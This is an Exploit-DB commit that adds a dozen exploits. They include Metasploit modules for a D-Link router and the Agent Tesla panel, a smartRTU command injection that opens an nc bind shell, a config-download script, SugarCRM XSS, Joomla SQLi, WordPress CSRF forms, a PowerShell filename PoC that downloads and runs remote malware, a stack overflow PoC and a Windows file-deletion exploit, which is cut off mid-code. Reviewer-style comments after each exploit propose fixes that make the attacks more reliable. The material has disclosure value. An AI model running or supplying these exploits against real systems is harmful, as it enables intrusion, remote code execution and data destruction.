DB: 2019-08-15
12 changes to exploits/shellcodes

Windows PowerShell - Unsanitized Filename Command Execution
ABC2MTEX 1.6.1 - Command Line Stack Overflow
Microsoft Windows 10 AppXSvc Deployment Service - Arbitrary File Deletion
Agent Tesla Botnet - Arbitrary Code Execution (Metasploit)
Mitsubishi Electric smartRTU / INEA ME-RTU - Unauthenticated Configuration Download
Mitsubishi Electric smartRTU / INEA ME-RTU - Unauthenticated OS Command Injection Bind Shell
SugarCRM Enterprise 9.0.0 - Cross-Site Scripting
Joomla! Component JS Jobs (com_jsjobs) 1.2.5 - 'customfields.php' SQL Injection
D-Link DIR-600M - Authentication Bypass (Metasploit)
WordPress Plugin Download Manager 2.5 - Cross-Site Request Forgery
TortoiseSVN 1.12.1 - Remote Code Execution
ManageEngine opManager 12.3.150 - Authenticated Code Execution
parent 998fb1eeec
commit 7e6884af13
13 changed files with 1303 additions and 0 deletions
62
exploits/hardware/webapps/47250.rb
Executable file
@ -0,0 +1,62 @@
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
include Msf::Auxiliary::Scanner
include Msf::Auxiliary::Report

def initialize(info = {})
super(update_info(info,
'Name' => 'CVE-2019-13101 D-Link DIR-600M Incorrect Access Control',
'Description' => %q{
This module attempts to find D-Link router DIR-600M which is
vulnerable to Incorrect Access Control. The vulnerability exists in
wan.htm, which is accessible without authentication. This
vulnerabilty can lead an attacker to manipulate WAN settings.
This module has been tested successfully on Firmware Version
3.01,3.02,3.03,3.04,3.05,3.06.
},
'Author' => [ 'Devendra Singh Solanki <devendra0x0[at]gmail.com>' ],
'License' => MSF_LICENSE,
'References' =>
[
'CVE', '2019-13101'
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Aug 08 2019'))

register_options(
[
Opt::RPORT(80)
])
end

def run_host(ip)
res = send_request_cgi({'uri' => '/login.htm'})
if res.nil? or res.code == 404
print_error("#{rhost}:#{rport} - Host is down.")
return
end

if res and res.code == 200 and res.body =~ /D-Link/
print_good("#{rhost}:#{rport} - It is a D-Link router")
else
print_error("#{rhost}:#{rport} - Not a D-Link router")
return
end

res = send_request_cgi({'uri' => '/wan.htm'})

if res and res.code == 200 and res.body =~ /PPPoE/
print_good("#{rhost}:#{rport} - Router is vulnerable for
Incorrect Access Control. CVE-2019-13101")
else
print_error("#{rhost}:#{rport} - Router is with different firmware.")
return
end

end
end
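Review bot: the `'References'` entry is a flat array (`'CVE', '2019-13101'`) rather than the nested `[ 'CVE', '2019-13101' ]` that Metasploit expects, so the CVE will not be registered as a reference; wrap it in its own array. Also `if res.nil? or res.code == 404` reports "Host is down" for a 404 that came from a live host, `Msf::Auxiliary::Report` is included but the vulnerable result is never handed to `report_vuln`, so nothing reaches the database, and `'DefaultTarget' => 0` has no effect on an auxiliary module that declares no targets.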
64
exploits/linux/dos/47254.txt
Normal file
@ -0,0 +1,64 @@
Exploit Title: ABC2MTEX 1.6.1 - Command Line Stack Overflow
Date: 2019-08-13
Exploit Author: Carter Yagemann <yagemann@gatech.edu>
Vendor Homepage: https://abcnotation.com/abc2mtex/
Software Link: https://github.com/mudongliang/source-packages/raw/master/CVE-2004-1257/abc2mtex1.6.1.tar.gz
Version: 1.6.1
Tested on: Debian Buster

An unsafe strcpy at abc.c:241 allows an attacker to overwrite the return
address from the openIn function by providing a long input filename. This
carries similar risk to CVE-2004-1257.

Setup:

$ wget https://github.com/mudongliang/source-packages/raw/master/CVE-2004-1257/abc2mtex1.6.1.tar.gz
$ tar -xzf abc2mtex1.6.1.tar.gz
$ make

$ gcc --version
gcc (Debian 8.3.0-6) 8.3.0
Copyright (C) 2018 Free Software Foundation, Inc.
This is free software; see the source for copying conditions. There is NO
warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.

PoC:

$ ./abc2mtex AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAFEDCBA

GDB:

We're going to place a breakpoint before and after abc.c:241 to show the overflow.

$ gdb -q ./abc2mtex
Reading symbols from ./abc2mtex...done.
(gdb) break abc.c:241
Breakpoint 1 at 0x4139: file abc.c, line 241.
(gdb) break abc.c:242
Breakpoint 2 at 0x414c: file abc.c, line 242.
(gdb) r AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAFEDCBA
Starting program: /tmp/tmp.4jy8nhwOI3/abc2mtex AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAFEDCBA

Breakpoint 1, openIn (filename=0x7fffffffe240 'A' <repeats 120 times>, "FEDCBA") at abc.c:241
241 (void) strcpy(savename,filename);
(gdb) bt
#0 openIn (filename=0x7fffffffe240 'A' <repeats 120 times>, "FEDCBA") at abc.c:241
#1 0x0000555555556f00 in main (argc=2, argv=0x7fffffffe4f8) at fields.c:273
(gdb) c
Continuing.

Breakpoint 2, openIn (filename=0x7fffffffe240 'A' <repeats 120 times>, "FEDCBA") at abc.c:242
242 (void) strcat(filename,".abc");
(gdb) bt
#0 openIn (filename=0x7fffffffe240 'A' <repeats 120 times>, "FEDCBA") at abc.c:242
#1 0x0000414243444546 in ?? ()
#2 0x00007fffffffe4f8 in ?? ()
#3 0x0000000200000000 in ?? ()
#4 0x0000000000000000 in ?? ()
(gdb) c
Continuing.
file "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAFEDCBA" does not exist

Program received signal SIGSEGV, Segmentation fault.
0x0000414243444546 in ?? ()
(gdb) quit
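Review bot: the advisory gives the input length (120 bytes of 'A' plus "FEDCBA") but not the declared size of `savename`, so the margin by which the `strcpy` at abc.c:241 overruns the buffer cannot be checked from the text; stating the buffer size would make the write-up reproducible. The second backtrace shows the saved return address replaced by 0x0000414243444546 ("FEDCBA" read little-endian) and no stack-smashing message precedes the SIGSEGV, so the plain `make` build evidently ran without `-fstack-protector`; the build flags belong next to the gcc version. The fix is to bound the copy (`snprintf`, or `strncpy` with `sizeof(savename)`), and the unbounded `strcat(filename,".abc")` at line 242, which appends to the caller's argv buffer, deserves the same treatment.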
106
exploits/php/remote/47256.rb
Executable file
@ -0,0 +1,106 @@
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking

include Msf::Exploit::Remote::HttpClient

def initialize(info={})
super(update_info(info,
'Name' => "Tesla Agent Remote Code Execution",
'Description' => %q{
This module exploits the command injection vulnerability of tesla agent botnet panel.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Ege Balcı <ege.balci@invictuseurope.com>' # author & msf module
],
'References' =>
[
['URL', 'https://prodaft.com']
],
'DefaultOptions' =>
{
'SSL' => false,
'WfsDelay' => 5,
},
'Platform' => ['php'],
'Arch' => [ ARCH_PHP ],
'Targets' =>
[
['PHP payload',
{
'Platform' => 'PHP',
'Arch' => ARCH_PHP,
'DefaultOptions' => {'PAYLOAD' => 'php/meterpreter/bind_tcp'}
}
]
],
'Privileged' => false,
'DisclosureDate' => "July 10 2018",
'DefaultTarget' => 0
))

register_options(
[
OptString.new('TARGETURI', [true, 'The URI of the tesla agent with panel path', '/WebPanel/']),
]
)
end

def check
res = send_request_cgi(
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, '/server_side/scripts/server_processing.php'),
)
#print_status(res.body)
if res && res.body.include?('SQLSTATE')
Exploit::CheckCode::Appears
else
Exploit::CheckCode::Safe
end
end

def exploit
check

name = '.'+Rex::Text.rand_text_alpha(4)+'.php'

res = send_request_cgi(
'method' => 'GET',
'uri' => normalize_uri(target_uri.path,'/server_side/scripts/server_processing.php'),
'encode_params' => true,
'vars_get' => {
'table' => 'passwords',
'primary' => 'password_id',
'clmns' => 'a:1:{i:0;a:3:{s:2:"db";s:3:"pwd";s:2:"dt";s:8:"username";s:9:"formatter";s:4:"exec";}}',
'where' => Rex::Text.encode_base64("1=1 UNION SELECT \"echo #{Rex::Text.encode_base64(payload.encoded)} | base64 -d > #{name}\"")
}
)

if res && res.code == 200 && res.body.include?('recordsTotal')
print_good("Payload uploaded as #{name}")
else
print_error('Payload upload failed :(')
Msf::Exploit::Failed
end


res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path,'/server_side/scripts/',name)}, 5
)

if res && res.code == 200
print_good("Payload successfully triggered !")
else
print_error('Payload trigger failed :(')
Msf::Exploit::Failed
end

end
end
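Review bot: `Msf::Exploit::Failed` on the two error paths in `exploit` is a bare constant expression that neither raises nor returns, so after "Payload upload failed" the module still sends the trigger request; use `fail_with(Failure::Unknown, '...')` there instead. The `check` call at the top of `exploit` likewise discards its return value, so a target that `check` rated `CheckCode::Safe` is exploited anyway; compare the result before proceeding. The `'References'` list carries only the vendor homepage `https://prodaft.com`, not an advisory URL, which makes the claimed disclosure date of July 10 2018 hard to verify.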
38
exploits/php/webapps/47234.py
Executable file
@ -0,0 +1,38 @@
#!/usr/bin/python

# Exploit Title: Mitsubishi Electric smartRTU & INEA ME-RTU Unauthenticated Configuration Download
# Date: 29 June 2019
# Exploit Author: (@xerubus | mogozobo.com)
# Vendor Homepage: https://eu3a.mitsubishielectric.com/fa/en/products/cnt/plcccl/items/smartRTU/local
# Vendor Homepage: http://www.inea.si/en/telemetrija-in-m2m-produkti/mertu-en/
# Firmware Version: Misubishi Electric 2.02 & INEA 3.0
# CVE-ID: CVE-2019-14927
# Full write-up: https://www.mogozobo.com/?p=3593

import sys, os, requests, socket

os.system('clear')

print("""\
_ _
___ (~ )( ~)
/ \_\ \/ /
| D_ ]\ \/ -= Conf_Me-smartRTU by @xerubus =-
| D _]/\ \ -= We all have something to hide =-
\___/ / /\ \\
(_ )( _)
@Xerubus
""")

host = raw_input("Enter RTU IP address: ")

php_page = '/saveSettings.php'
url = "http://{}{}".format(host, php_page)

print "[+] Attempting to download smartRTU configuration file"

r = requests.get(url)
if r.status_code == 200:
print "[+] Successfully obtained smartRTU configuration file.. saving to smartRTU_conf.xml\n"
with open('smartRTU_conf.xml', 'w') as f:
f.write(r.content)
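Review bot: a non-200 response is silent, because `if r.status_code == 200:` has no `else` branch, so a patched or unreachable device produces no output at all; report the status code on the other branch. The script also mixes a Python 3 style `print("""...""")` for the banner with Python 2 `print "..."` statements and `raw_input`, so it runs only under Python 2 despite the bare `/usr/bin/python` shebang; `r.content` (bytes) is written to a file opened in text mode; and `sys` and `socket` are imported but never used.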
69
exploits/php/webapps/47235.py
Executable file
@ -0,0 +1,69 @@
#!/usr/bin/python

# Exploit Title: Mitsubishi Electric smartRTU & INEA ME-RTU Unauthenticated OS Command Injection
# Date: 29 June 2019
# Exploit Author: (@xerubus | mogozobo.com)
# Vendor Homepage: https://eu3a.mitsubishielectric.com/fa/en/products/cnt/plcccl/items/smartRTU/local
# Vendor Homepage: http://www.inea.si/en/telemetrija-in-m2m-produkti/mertu-en/
# Firmware Version: Misubishi Electric 2.02 & INEA 3.0
# CVE-ID: CVE-2019-14931
# Full write-up: https://www.mogozobo.com/?p=3593

import sys, os, requests, socket

os.system('clear')

print("""\
_ _
___ (~ )( ~)
/ \_\ \/ /
| D_ ]\ \/ -= Bind_Me-smartRTU by @xerubus =-
| D _]/\ \ -= We all have something to hide =-
\___/ / /\ \\
(_ )( _)
@Xerubus
""")

host = raw_input("Enter RTU IP address: ")
port = raw_input("Enter bind shell port number: ")

php_page = '/action.php'
url = "http://{}{}".format(host, php_page)
payload = {'host' : ';sudo /usr/sbin/service ../../bin/nc -nvlp '+port+' -e /bin/sh&PingCheck=Test'}

print "\n[+] Building payload"
print "[+] Sending payload"
print "[+] Attempting connection to smartRTU"

try:
r = requests.post(url, data=payload, timeout=1)
except:
pass

port = (int(port))

try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))

try :
print "[+] Connected to the smartRTU!\n"
while 1:
cmd = raw_input("(smartRTU-shell) # ");
s.send(cmd + "\n");
result = s.recv(1024).strip();
if not len(result) :
print "\n[!] Play nice now skiddies....\n\n"
s.close();
break;
print(result);

except KeyboardInterrupt:
print "\n[+] ^C Received, closing connection"
s.close();
except EOFError:
print "\n[+] ^D Received, closing connection"
s.close();

except socket.error:
print "[!] Failed to connect to bind shell."
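Review bot: in the interactive loop, `if not len(result)` closes the socket and breaks whenever a command returns no output, so any silent command (for example `cd`) ends the session; a zero-length `recv` (peer closed) and an empty command response need to be told apart. A single `s.recv(1024)` also truncates longer output. The bare `except: pass` around `requests.post` swallows every exception, including a mistyped host, so the failure only surfaces later as a less informative socket error from `s.connect`; catch `requests.exceptions.RequestException` and report it. `port` is converted with `int()` only after it has been interpolated into the payload, so a non-numeric value is rejected only after the request has already been sent.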
30
exploits/php/webapps/47247.txt
Normal file
@ -0,0 +1,30 @@
# Exploit Title: 0Day UnauthenticatedXSS SugarCRM Enterprise
# Google Dork: N/A
# Date: 11.08.2019
# Exploit Author: Ilca Lucian Florin
# Vendor Homepage: https://www.sugarcrm.com
# Version: 9.0.0
# Tested on: Windows 7 / Internet Explorer 11 / Google Chrome 76
# CVE : 2019-14974

The application fails to sanitize user input on https://sugarcrm-qms.XXX.com/mobile/error-not-supported-platform.html and reflect the input directly in the HTTP response, allowing the hacker to exploit the vulnerable parameter and have malicious content executed in the victim's browser.

Steps to reproduce:

1.Attacker will craft a malicious payload and create a legitimate link with the payload included;
2. Attacker will send the link to the victim;
3. Upon clicking on the link, the malicious payload will be reflected in the response and executed in the victim’s browser.

The behavior can be observed by visiting the following URL:

https://server/mobile/error-not-supported-platform.html?desktop_url=javascript:alert(document.cookie);//itms://

Clicking on FULL VERSION OF WEBSITE will trigger the XSS.

Impact statement:

Although requiring user interaction, reflected XSS impact might range from web defacement to stealing user info and full account takeover, depending on the circumstances.

Recommendation:

Always ensure to validate parameters input and encode the output.
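Review bot: the CVE line reads `CVE : 2019-14974` without the `CVE-` prefix, and the affected host is written as `sugarcrm-qms.XXX.com` in the description but `https://server/` in the PoC URL; one placeholder should be used throughout. The recommendation ("validate parameters input and encode the output") is too generic for this bug: HTML-encoding does not neutralise a `javascript:` URL that ends up in a link's `href`, which is exactly what the `desktop_url` parameter and the FULL VERSION OF WEBSITE click show; the fix is to accept only `http:`/`https:` (or a relative path) for `desktop_url` before emitting it as a link target.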
23
exploits/php/webapps/47249.txt
Normal file
@ -0,0 +1,23 @@
#Exploit Title: Joomla! component com_jsjobs - 'customfields.php' SQL Injection
#Dork: inurl:"index.php?option=com_jsjobs"
#Date: 13.08.19
#Exploit Author: qw3rTyTy
#Vendor Homepage: https://www.joomsky.com/
#Software Link: https://www.joomsky.com/5/download/1
#Version: 1.2.5
#Tested on: Debian/nginx/joomla 3.9.0
#####################################
#Vulnerability details:
#####################################
Vulnerable code is in line 171 in file site/models/customfields.php

169 function dataForDepandantField( $val , $childfield){
170 $db = $this->getDBO();
171 $query = "SELECT userfieldparams,fieldtitle FROM `#__js_job_fieldsordering` WHERE field = '".$childfield."'"; //!!!
172 $db->setQuery($query);
173 $data = $db->loadObject();

#####################################
#PoC:
#####################################
$> sqlmap.py -u "http://localhost/index.php?option=com_jsjobs&task=customfields.datafordepandantfield&fvalue=0&child=0" --random-agent --dbms=mysql --method GET -p child --technique E
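Review bot: the advisory shows the defect (`$childfield` concatenated unquoted into the `WHERE field = '...'` clause at line 171) but not the remediation; for a Joomla component that is `$db->quote($childfield)` at minimum, or a prepared statement, before `setQuery()` on line 172. The header block has no CVE or vendor-advisory reference, and the PoC does not say which request parameter maps to `$childfield`, although the sqlmap line (`-p child`) implies it is `child`; stating that mapping, and that `fvalue` feeds `$val`, would let a reader confirm the finding without running the tool.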
51
exploits/php/webapps/47251.txt
Normal file
@ -0,0 +1,51 @@
# Exploit Title: CSRF vulnerabilities in WordPress Download Manager Plugin 2.5
# Google Dork: inurl:"/wp-content/plugins/download-manager
# Date: 24 may, 2019
# Exploit Author: Princy Edward
# Exploit Author Blog : https://prinyedward.blogspot.com/
# Vendor Homepage: https://www.wpdownloadmanager.com/
# Software Link: https://wordpress.org/plugins/download-manager/
# Tested on: Apache/2.2.24 (CentOS)
POC

#1

There is no CSRF nonce check performed in "POST
/wp-admin/admin-ajax.php?action=wpdm_save_email_setting" request.

#Code

<form method="POST"
action="http://localhost/wp-admin/admin-ajax.php?action=wpdm_save_email_setting">
<input type="hidden" name="__wpdm_email_template" value="default.html">
<input type="hidden" name="__wpdm_email_setting[logo]"
value="https://hacker.jpg">
<input type="hidden" name="__wpdm_email_setting[banner]"
value="https://hacker.jpg">
<input type="hidden" name="__wpdm_email_setting[footer_text]"
value="https://malicious-url.com"><input type="hidden" name="__wpdm_email_setting[facebook]"
value="https://malicious-url.com">
<input type="hidden" name="__wpdm_email_setting[twitter]" value="https://malicious-url.com">
<input type="hidden" name="__wpdm_email_setting[youtube]"
value="https://malicious-url.com">
<input type="submit">
</form>

#2

There is no CSRF nonce check performed in "POST
/wp-admin/edit.php?post_type=wpdmpro&page=templates&_type=email&task=EditEmailTemplat
e&id=default" request.

#Code

<form method="POST"
action="http://localhost/wp-admin/edit.php?post_type=wpdmpro&page=templates&_type=email&
task=EditEmailTemplate&id=default">
<input type="hidden" name="id" value="default">
<input type="hidden" name="email_template[subject]" value="forget password">
<input type="hidden" name="email_template[message]" value="aaa">
<input type="hidden" name="email_template[from_name]" value="hacker">
<input type="hidden" name="email_template[from_email]" value="hacker@hacker.com">
<input type="submit">
</form>
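Review bot: in #2 the request URL is wrapped across two lines (`...task=EditEmailTemplat` / `e&id=default`), and the `action` attribute of the second form is split the same way, so neither is copy-safe; join them. Neither #1 nor #2 states the privilege level of the victim session (the endpoints are `admin-ajax.php` and `edit.php`, both served only to a logged-in user), which matters for rating the issue. The fix on the plugin side is a nonce check (`check_ajax_referer()` for the AJAX action, `check_admin_referer()` for the edit page) together with a `current_user_can()` capability check in each handler. The header block also omits a `Version:` line even though the title names 2.5.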
144
exploits/windows/dos/47248.py
Executable file
@ -0,0 +1,144 @@
'''
[+] Credits: John Page (aka hyp3rlinx)
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/MICROSOFT-WINDOWS-POWERSHELL-UNSANITIZED-FILENAME-COMMAND-EXECUTION.txt
[+] ISR: Apparition Security


[Vendor]
www.microsoft.com


[Product]
Windows PowerShell

Windows PowerShell is a Windows command-line shell designed especially for system administrators.
PowerShell includes an interactive prompt and a scripting environment that can be used independently or in combination.


[Vulnerability Type]
Unsanitized Filename Command Execution


[CVE Reference]
N/A


[Security Issue]
PowerShell can potentially execute arbitrary code when running specially named scripts due to trusting unsanitized filenames.
This occurs when ".ps1" files contain semicolons ";" or spaces as part of the filename, causing the execution of a different trojan file;
or the running of unexpected commands straight from the filename itself without the need for a second file.

For trojan files it doesn't need to be another PowerShell script and can be one of the following ".com, .exe, .bat, .cpl, .js, .vbs and .wsf.
Therefore, the vulnerably named file ".\Hello;World.ps1" will instead execute "hello.exe", if that script is invoked using the standard
Windows shell "cmd.exe" and "hello.exe" resides in the same directory as the vulnerably named script.

However, when such scripts are run from PowerShells shell and not "cmd.exe" the "&" (call operator) will block our exploit from working.

Still, if the has user enabled ".ps1" scripts to open with PowerShell as its default program, all it takes is double click the file to trigger
the exploit and the "& call operator" will no longer save you. Also, if the user has not enabled PowerShell to open .ps1 scripts
as default; then running the script from cmd.exe like: c:\>powershell "\Hello;World.ps1" will also work without dropping into the PowerShell shell.

My PoC will download a remote executable save it to the victims machine and then execute it, and the PS files contents are irrelevant.
Also, note I use "%CD" to target the current working directory where the vicitm has initially opened it, after it calls "iwr" (invoke-webrequest)
abbreviated for space then it sleeps for 2 seconds and finally executes.

C:\>powershell [Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes("'powershell iwr 192.168.1.10/n -O %CD%\n.exe ;sleep -s 2;start n.exe'"))

This can undermine the integrity of PowerShell as it potentially allows unexpected code execution; even when the scripts contents are visually reviewed.
We may also be able to bypass some endpoint protection or IDS systems that may look at the contents or header of a file but not its filename where are
commands can be stored.

For this to work the user must have enabled PowerShell as its default program when opening ".ps1" files.

First, we create a Base64 encoded filename for obfuscation; that will download and execute a remote executable named in this case "n.exe".
c:\>powershell [Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes("'powershell iwr 192.168.1.10/n -O %CD%\n.exe ;sleep -s 2;start n.exe'"))

Give the PS script a normal begining name, then separate commands using ";" semicolon e.g.

Test;powershell -e <BASE64 ENCODED COMMANDS>;2.ps1

Create the executable without a file extension to save space for the filename then save it back using the -O parameter.
The "-e" is abbreviated for EncodedCommand to again save filename space.

Host the executable on web-server or just use python -m SimpleHTTPServer 80 or whatever.
Double click to open in PowerShell watch the file get downloaded saved and executed!

My example is used as a "filename embedded downloader", but obviously we can just call other secondary trojan files of various types in the same directory.

Note: User interaction is required, and obviously running any random PS script is dangerous... but hey we looked at the file content and it simply printed a string!


[Exploit / PoC]
'''

from base64 import b64encode
import argparse,sys
#Windows PowerShell - Unsantized Filename Command Execution Vulnerability PoC
#Create ".ps1" files with Embedded commands to download, save and execute malware within a PowerShell Script Filename.
#Expects hostname/ip-addr of web-server housing the exploit.
#By hyp3rlinx
#Apparition Security
#====================


def parse_args():
parser.add_argument("-i", "--ipaddress", help="Remote server to download and exec malware from.")
parser.add_argument("-m", "--local_malware_name", help="Name for the Malware after downloading.")
parser.add_argument("-r", "--remote_malware_name", help="Malwares name on remote server.")
return parser.parse_args()

def main(args):
PSEmbedFilenameMalwr=""
if args.ipaddress:
PSEmbedFilenameMalwr = "powershell iwr "+args.ipaddress+"/"+args.remote_malware_name+" -O %CD%\\"+args.local_malware_name+" ;sleep -s 2;start "+args.local_malware_name
return b64encode(PSEmbedFilenameMalwr.encode('UTF-16LE'))

def create_file(payload):
f=open("Test;PowerShell -e "+payload+";2.ps1", "w")
f.write("Write-Output 'Have a nice day!'")
f.close()

if __name__=="__main__":

parser = argparse.ArgumentParser()
PSCmds = main(parse_args())

if len(sys.argv)==1:
parser.print_help(sys.stderr)
sys.exit(1)

create_file(PSCmds)
print "PowerShell - Unsantized Filename Command Execution File created!"
print "By hyp3rlinx"

'''
[POC Video URL]
https://www.youtube.com/watch?v=AH33RW9g8J4


[Network Access]
Remote


[Severity]
High


[Disclosure Timeline]
Vendor Notification: July 20, 2019
MSRC "does not meet the bar for security servicing" : July 23, 2019
August 1, 2019 : Public Disclosure



[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
or exploits by the author or elsewhere. All content (c).
'''

hyp3rlinx
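Review bot: `-m/--local_malware_name` and `-r/--remote_malware_name` are not declared `required=True`, so supplying only `-i` makes `main()` raise a `TypeError` when it concatenates `None` into the string; mark them required. `parse_args()` uses the module-level `parser` that is only assigned inside the `__main__` block, and `main(parse_args())` runs before the `len(sys.argv)==1` help check, so the order of those statements should be reversed. The `print "..."` statements make the file Python 2 only, and under Python 3 `"Test;PowerShell -e "+payload` would also fail because `b64encode` returns bytes; decode it before concatenating. The advisory text itself records the defensive facts worth keeping visible: the issue needs user interaction, requires `.ps1` files to be associated with PowerShell, and was rated by MSRC as not meeting the bar for servicing. "Unsantized" in the comments and the final message should read "Unsanitized".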
244
exploits/windows/local/47253.cpp
Normal file
@ -0,0 +1,244 @@
/*
# Author : Abdelhamid Naceri
# Discovered On : 13/08/2019
# Description : An Elevation Of Privileges Exist when the microsoft AppXSvc
Deployment Service Cannot Properly Handle The Folder Junction lead to an arbitrary file deletion
from a low integrity user .
# Still Unpatched On 13/08/2019
Here Is A Demo Video https://youtu.be/jqYwMcNvTtM
*/
#include"windows.h"
#include"iostream"
#include"conio.h"
#include"stdio.h"
#include"tlhelp32.h"
#include"cstdio"
#include"wchar.h"
#include"process.h"
#include"wchar.h"
#include"string"
#include"tchar.h"

#pragma warning(disable : 4996)
#pragma comment(lib, "advapi32.lib")
#ifndef UNICODE
typedef std::string String;
#else
typedef std::wstring String;
#endif

using namespace std;

bool FileExists(const wchar_t* file) {
if (INVALID_FILE_ATTRIBUTES == GetFileAttributes(file) && GetLastError() == ERROR_FILE_NOT_FOUND)
{
return false;
}
else {
return true;
}
}

void remove_dir(const wchar_t* folder)
{
std::wstring search_path = std::wstring(folder) + _T("/*.*");
std::wstring s_p = std::wstring(folder) + _T("/");
WIN32_FIND_DATA fd;
HANDLE hFind = ::FindFirstFile(search_path.c_str(), &fd);
if (hFind != INVALID_HANDLE_VALUE) {
do {
if (fd.dwFileAttributes & FILE_ATTRIBUTE_DIRECTORY) {
if (wcscmp(fd.cFileName, _T(".")) != 0 && wcscmp(fd.cFileName, _T("..")) != 0)
{
remove_dir((wchar_t*)(s_p + fd.cFileName).c_str());
}
}
else {
DeleteFile((s_p + fd.cFileName).c_str());
}
} while (::FindNextFile(hFind, &fd));
::FindClose(hFind);
_wrmdir(folder);
}
}

void killProcessByName(const wchar_t* filename)
{
HANDLE hSnapShot = CreateToolhelp32Snapshot(TH32CS_SNAPALL, NULL);
PROCESSENTRY32 pEntry;
pEntry.dwSize = sizeof(pEntry);
BOOL hRes = Process32First(hSnapShot, &pEntry);
while (hRes)
{
if (wcscmp(pEntry.szExeFile, filename) == 0)
{
HANDLE hProcess = OpenProcess(PROCESS_TERMINATE, 0,
(DWORD)pEntry.th32ProcessID);
if (hProcess != NULL)
{
TerminateProcess(hProcess, 9);
CloseHandle(hProcess);
}
}
hRes = Process32Next(hSnapShot, &pEntry);
}
CloseHandle(hSnapShot);
}

bool IsProcessRunning(const wchar_t* processName)
{
bool exists = false;
PROCESSENTRY32 entry;
entry.dwSize = sizeof(PROCESSENTRY32);

HANDLE snapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, NULL);

if (Process32First(snapshot, &entry))
while (Process32Next(snapshot, &entry))
if (!_wcsicmp(entry.szExeFile, processName))
exists = true;

CloseHandle(snapshot);
return exists;
}

bool dirExists(const std::string& dirName_in)
{
DWORD ftyp = GetFileAttributesA(dirName_in.c_str());
if (ftyp == INVALID_FILE_ATTRIBUTES)
return false;

if (ftyp & FILE_ATTRIBUTE_DIRECTORY)
return true;

return false;
}

void KillEdge()
{
killProcessByName(L"MicrosoftEdge.exe");
}

void StartEdge()
{
try
{
system("start microsoft-edge:");
}
catch (...){}
}

void exploit(const char* path) {
//Inintializing the variable before begining
int attempt = 0;
string command;
wchar_t* userprofile = _wgetenv(L"USERPROFILE");
const wchar_t* relpath = (L"\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe");
//I created roaming path variable because sometime when i try to wipe ms-edge folder he deny the access so as a solution
//I deleted him first
const wchar_t* roamingpath = (L"\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\RoamingState");
wstring froamingpath(userprofile);
froamingpath += wstring(roamingpath);
wstring fullpath(userprofile);
fullpath += std::wstring(relpath);
wchar_t* szBuffsrc = (wchar_t*)fullpath.c_str();
wstring fpath(szBuffsrc);
string strfpath(fpath.begin(), fpath.end());
//Check If MS-Edge Need To Write DACL Or Not

if (dirExists(strfpath) != true) {
printf("[!] Wait MS-Edge Need To Write The DACL");
StartEdge();
for (;;) {
Sleep(1000);
if (IsProcessRunning(L"MicrosoftEdge.exe") == true) { break; }
|
||||||
|
}
|
||||||
|
StartEdge();
|
||||||
|
Sleep(7000);
|
||||||
|
KillEdge();
|
||||||
|
printf("\r ");
|
||||||
|
|
||||||
|
}
|
||||||
|
|
||||||
|
//End Of Check
|
||||||
|
printf("\r# Author : Abdelhamid Naceri\n");
|
||||||
|
printf("# Tested On Windows 10 32&64bit\n");
|
||||||
|
printf("# Description : A Vulnerabilitie Exist On Microsoft AppXSvc Deployement Service (\"wsappx\") Could Allow An Attacker To Arbitratry Delete Any File Exist On A Windows Machine\n");
|
||||||
|
printf("[+] Checking If Path Exist ...");
|
||||||
|
Sleep(2000);
|
||||||
|
if (dirExists(path) != true) {
|
||||||
|
printf("Your Path Is Invalid");
|
||||||
|
ExitProcess(EXIT_FAILURE); }
|
||||||
|
else {
|
||||||
|
printf("Exist !\n");
|
||||||
|
KillEdge();
|
||||||
|
printf("[+] Starting MS-Edge ...\n");
|
||||||
|
StartEdge();
|
||||||
|
Sleep(4000);
|
||||||
|
printf("[+] Killing MS-Edge ...\n");
|
||||||
|
KillEdge();
|
||||||
|
Sleep(3000);
|
||||||
|
printf("[+] Wipping MS-Edge Directory ...\n");
|
||||||
|
killProcessByName(L"dllhost.exe");//I Kill This Process Because Somethime He Lock The Files
|
||||||
|
remove_dir(roamingpath);
|
||||||
|
remove_dir(szBuffsrc);
|
||||||
|
Sleep(2000);
|
||||||
|
remove_dir(szBuffsrc);
|
||||||
|
printf("[+] Checking If Directory Exist Anymore ...");
|
||||||
|
if (dirExists(strfpath) == true) {
|
||||||
|
